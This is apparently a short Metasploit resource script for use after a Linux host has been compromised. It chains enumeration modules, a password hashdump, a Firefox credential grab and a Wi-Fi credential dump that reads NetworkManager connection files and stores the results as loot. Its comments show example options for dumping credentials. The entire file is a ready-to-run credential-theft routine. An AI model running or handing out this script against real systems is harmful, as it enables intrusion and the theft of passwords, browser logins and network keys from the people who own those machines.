##
# Add module auto-run options as 'arguments' to further enumeration ..
# example: run post/linux/gather/wifi_dump_linux DUMP_CREDS=true
# example: run post/linux/gather/wifi_dump_linux DUMP_CREDS=true ESSID_DUMP=true
# example: run post/linux/gather/wifi_dump_linux STORE_LOOT=true REMOTE_DIR="/etc/NetworkManager/system-connections"
##
sysinfo
run post/linux/gather/enum_system
run post/linux/gather/enum_network
run post/linux/gather/hashdump
run post/multi/gather/firefox_creds
run post/linux/gather/wifi_dump_linux STORE_LOOT=true DUMP_CREDS=true
